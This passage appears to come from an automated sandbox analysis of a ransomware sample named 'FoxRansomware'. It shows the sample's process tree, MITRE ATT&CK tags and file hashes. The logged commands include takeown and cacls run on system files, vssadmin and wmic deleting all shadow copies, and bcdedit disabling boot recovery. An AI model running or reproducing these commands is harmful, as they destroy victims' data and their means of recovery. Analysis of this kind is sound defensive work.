C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edb.log" -nobanner4⤵PID:6252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""2⤵PID:5600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C3⤵PID:2416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"3⤵PID:7136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner3⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""2⤵PID:6176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"3⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner3⤵PID:192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner4⤵PID:5520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C3⤵PID:428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"3⤵
- Modifies file permissions
PID:6332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner3⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner4⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:3516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵PID:6236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:6444
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:6228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵PID:5344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:5608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵PID:5664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵PID:6988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵PID:6468
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG1""2⤵PID:6288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C3⤵PID:5268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG1"3⤵
- Modifies file permissions
PID:6360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "settings.dat.LOG1" -nobanner3⤵PID:6472
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "settings.dat.LOG1" -nobanner4⤵PID:6392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:4904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:6576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- System Location Discovery: System Language Discovery
PID:6348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "settings.dat" -nobanner3⤵PID:6500
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "settings.dat" -nobanner4⤵PID:6688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\EDB.log""2⤵PID:8188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\EDB.log" /E /G Admin:F /C3⤵PID:6636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\EDB.log"3⤵
- Modifies file permissions
PID:6588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "EDB.log" -nobanner3⤵PID:6520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "EDB.log" -nobanner4⤵PID:6504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:6724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:6524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:6552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "background.png" -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:6496 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "background.png" -nobanner4⤵PID:6716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:5560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:6564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:6696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:6976 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:6928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:5280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:7000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- System Location Discovery: System Language Discovery
PID:5392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:7524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:7396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""2⤵PID:5336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C3⤵PID:6172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"3⤵
- Modifies file permissions
PID:5596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner3⤵PID:7388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner4⤵PID:7812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:7440
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:7224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵PID:7484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:7228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:7900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:7384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵PID:4184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵PID:5932
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:7784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:7656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵
- Modifies file permissions
PID:976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:7252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵PID:7920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:3792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:7276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵PID:7580
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:2220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:7760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:8040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:5668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:8052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:7944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:8108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:8060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:7984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:8136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb00001.log""2⤵PID:7096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb00001.log" /E /G Admin:F /C3⤵PID:8012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb00001.log"3⤵PID:6652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edb00001.log" -nobanner3⤵PID:8076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edb00001.log" -nobanner4⤵PID:7772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:8184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:3168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵
- System Location Discovery: System Language Discovery
PID:6860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵PID:7804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:7044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵PID:8156
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:5716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:1452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵PID:5360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:3012
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵PID:5192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5184
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\JhBmmRC9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:7304
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:7664
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:7848
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:7748
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:7732
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7240
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5bc64458846da9f6b76ea31defb9196be
SHA1e7fbe48a0a9fccfd0ed6f749a2bb970e575ae072
SHA25654ea98cb76e140c6ed62d6470faa9688dd0fa67e99c69fb1b9e41d016c1aa894
SHA512c5e40bb8a0cc3f70a0120abe6d5e73a3c706152fb2648de6715e04f656cb052c200edbda0d8c554c50c1732c349bed2f703bcebac858dabcfcddce89ae3735e2
-
Filesize
3KB
MD51bc4ac3bc39888eaeb8375cd61cc8e0a
SHA13a54a05fcb3d19f81277b558f844d24ea56953d2
SHA25685b3a1b27e530633b5be1cfe9a0c19de839db3c531fbdeeb1f12a013756fa0fc
SHA5125df3349fcd0fcfa404d45aedb5b3af2189400f5e2881ad39d8e690d748616acb897aafd2662bac26b09084e90d9e139a479fadf4034ec6dbd637d803b66b659f
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
